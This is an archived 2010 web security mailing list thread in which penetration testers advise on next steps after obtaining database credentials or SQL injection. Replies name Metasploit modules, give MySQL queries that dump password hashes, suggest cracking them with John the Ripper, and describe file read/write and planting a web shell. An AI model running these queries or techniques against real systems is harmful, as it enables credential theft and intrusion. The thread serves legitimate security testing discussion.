[WEB SECURITY] Database tools required

Will Vandevanter Will_Vandevanter at rapid7.com
Tue May 18 15:01:54 EDT 2010


There are a number of attack vectors you can use from here. One of my favorite privilege escalation techniques is adding a page to the server as a shell. Typically, your db user will need the ability to create tables and write the fs. This technique is great for pivoting into the DMZ depending on what your goal(s) for the engagement is.

I would also look into gaining access to other accounts as I often find extra/hidden functionality as a higher level user. One way to do this is query for tables with pass as a column name (e.g. in MySQL: SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'password'; ). Often this hidden/extra functionality is not tested with the same rigor as other parts of the application and, on occasion, even allows me to directly access the filesystem (e.g. via deployment scripts, etc.).

-Will

________________________________
From: Shlomi Narkolayev [shlominar at gmail.com]
Sent: Tuesday, May 18, 2010 4:08 AM
To: nArEn ÁĹ0ПΞ Ŵ0ĹŦஇ
Cc: websecurity at webappsec.org
Subject: Re: [WEB SECURITY] Database tools required

Run these:
SELECT user FROM mysql.user;
SELECT host, user, password FROM mysql.user;

Use "John the Ripper" for cracking the password hashes.

Listing databases: SELECT distinct(db) FROM mysql.db;

Load file from OS: SELECT load_file(0x63...);
SELECT ... INTO DUMPFILE...
....

Kind Regards,
Narkolayev Shlomi.

Visit my blog: http://Narkolayev-Shlomi.blogspot.com


2010/5/18 nArEn ÁĹ0ПΞ Ŵ0ĹŦஇ <narentherival at gmail.com<mailto:narentherival at gmail.com>>
Hello
very nice and informative post :)  Thanks for it
during my work i came across same scenario  but more difficult one

- the database is MYSQL 4.1 , so no information_schema thing
- the user is user at localhost - so no admin rights

The application is vulnerable to sql injection

in such case what u think what should be next step ??  any idea  ./

Thanks

Have a nice day :)

On Wed, May 12, 2010 at 10:00 AM, Shlomi Narkolayev <shlominar at gmail.com<mailto:shlominar at gmail.com>> wrote:
Hello,

If it's a little bit serious website/organization so I'm pretty sure you will not get direct access to the DB,  in most organizations the DMZ firewall allow access only to the application/web server on port 80/443 and not to the DB server.
As I understand, you got databases' credentials using Penetration Test on the application, so I suggest you to use SQL injection to extract databases' entries in the same way as you found out the credentials.
If you only have Blind SQL Injection, so you can use some automated tools that will help you extract DB's entries, you can use: Sqlmap, Absinthe, Pangolin, BSQL Hacker and many others.
Try first to find out the database version: Select @@version;
If it's MySQL, find out tables names using: Select table_schema, table_name From information_schema.Tables;
If it's MS-SQL: SELECT name FROM master..sysobjects WHERE xtype = 'U';
Then just run: Select * from %Tables_Names%;

If this website is hosted on GoDaddy or something similar to that, so you just need to get DBs' server IP, the best way is to get it from the connection string, you can also try to find the IP using SQL Injection on the application.

Kind Regards,
Narkolayev Shlomi.

Visit my blog: http://Narkolayev-Shlomi.blogspot.com



On Tue, May 11, 2010 at 10:38 PM, Will Vandevanter <Will_Vandevanter at rapid7.com<mailto:Will_Vandevanter at rapid7.com>> wrote:
Check out the following auxiliaries in metasploit:

admin/oracle/oracle_login
admin/oracle/oracle_sql
scanner/mssql/mssql_login
admin/mssql/mssql_sql
scanner/mysql/mysql_login
admin/mysql/mysql_sql
scanner/db2/db2_auth

-Will

________________________________
From: Jorge Correa [jacorream at gmail.com<mailto:jacorream at gmail.com>]
Sent: Tuesday, May 11, 2010 3:15 PM
To: Will Vandevanter
Cc: p0wnsauc3 at gmail.com<mailto:p0wnsauc3 at gmail.com>; Parmendra Sharma; websecurity at webappsec.org<mailto:websecurity at webappsec.org>

Subject: Re: [WEB SECURITY] Database tools required

Could you recommend us some of these Metasploit tools?


Thank you,
Jorge Correa



On Tue, May 11, 2010 at 13:36, Will Vandevanter <Will_Vandevanter at rapid7.com<mailto:Will_Vandevanter at rapid7.com>> wrote:
Also, check out Metasploit which has some great modules for connecting to specific DBs.

________________________________________
From: TAS [p0wnsauc3 at gmail.com<mailto:p0wnsauc3 at gmail.com>]
Sent: Tuesday, May 11, 2010 1:59 PM
To: Parmendra Sharma; websecurity at webappsec.org<mailto:websecurity at webappsec.org>
Subject: Re: [WEB SECURITY] Database tools required

Hi,

Though your are not very clear with your question, I assume, since you have got the DB credentials, you want to connect to the database at the backend directly. If that is so, every database has its client. Download and install the client and connect to the backend.

TAS!

Sent from BlackBerry® - Vodafone

________________________________
From: Parmendra Sharma <s.parmendra at gmail.com<mailto:s.parmendra at gmail.com>>
Date: Tue, 11 May 2010 11:07:20 +0530
To: <websecurity at webappsec.org<mailto:websecurity at webappsec.org>>
Subject: [WEB SECURITY] Database tools required

Hi All,

While performing a VA / PT exercise of an application i got the database credentials. Kindly suggest any tool which connects me to the database through the application.

--
Thanks and Regards:

Parmendra Sharma
Computer Security Analyst

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net<http://irc.freenode.net> #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA






--
ܔܢܜܔNaReN(๏̯͡๏)
ιηƒσямαт!ση ~# αησтнєя ηαмє σƒ gσ∂ ~●•●•●๋•

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20100518/b3f754eb/attachment.html>


More information about the websecurity mailing list